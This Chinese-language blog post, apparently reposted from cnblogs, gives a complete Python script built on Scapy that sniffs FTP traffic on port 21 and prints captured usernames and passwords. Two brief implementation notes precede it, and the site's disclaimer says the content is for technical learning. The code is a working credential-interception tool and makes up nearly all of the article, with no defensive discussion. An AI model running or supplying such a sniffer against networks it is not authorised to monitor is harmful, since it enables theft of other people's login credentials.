ICode9

精准搜索请尝试: 精确搜索
首页 > 编程语言> 文章详细

利用Python的Scapy模块实现FTP服务器用户名密码的截取

2022-04-27 10:32:59  阅读:147  来源: 互联网

标签:__ FTP pkt Python res self Scapy print interface


  注意事项:

      1. 在sniff中的自定义回调函数packet_handler需要捕捉异常,因为输入的参数pkt会出现None的情况,会因此异常;

      2. 本实例中编写了两个列表,存放常见的用户名以及密码的字段,因为对于每个ftp应用可能该字段名称会有所区别,需要遍历这两个列表,不过一旦发现有匹配,则退出相关的循环。

from scapy.all import *
import optparse
import sys
import re
import termcolor


def banner():
    banner = """
        ******************************************************************
        ******************************************************************
                           FTP Sniffer Tool by Jason Wong V1.0
        ******************************************************************
        ******************************************************************
    """
    print(banner)


def get_params():
    parser = optparse.OptionParser('Usage: <Program> -i interface')
    parser.add_option('-i', '--interface', dest='interface', type='string', help='Specity interface to listen on ')
    options, args = parser.parse_args()
    if options.interface is None:
        print(parser.usage)
        sys.exit(0)
    return options.interface

class FTPSniffer:
    def __init__(self,interface):
        self.interface = interface
        self.userlist = ['User', 'Username','username', 'user','USER']
        self.passwdlist = ['Password', 'password', 'pass', 'Pass', 'passwd', 'Passwd','PASS']
       
    

    def packet_handler(self,pkt):
        try:
 
            destination_ip = pkt.getlayer(IP).dst
            source_ip = pkt.getlayer(IP).src
            print("Capturing FTP login traffic to : %s  from : %s" % (destination_ip, source_ip))
       
            if pkt.getlayer(Raw):
                                
                raw_data = pkt.getlayer(Raw).load.decode('utf-8')
                # print(raw_data)
                for each_word in self.userlist:
                    res = re.findall(r'(?i)%s (.*)' % each_word, raw_data)            
                    
                    if res:
                        print(termcolor.colored("Username: %s" % res[0],'blue'))
                        break

                for each_word in self.passwdlist:
                    res = re.findall(r'(?i)%s (.*)' % each_word, raw_data)
                    if res:
                        print(termcolor.colored("Password: %s" % res[0],'blue'))
                        break
        except:
            pass


    
    def run(self):
        try:
            sniff(filter='tcp port 21', prn=self.packet_handler, iface=self.interface)
        except KeyboardInterrupt:
            print("Existing the program!")
            sys.exit()


    
if __name__ == "__main__":
    banner()
    interface = get_params()
    ftpsniffer = FTPSniffer(interface)
    ftpsniffer.run()

 

标签:__,FTP,pkt,Python,res,self,Scapy,print,interface
来源: https://www.cnblogs.com/jason-huawen/p/16197889.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有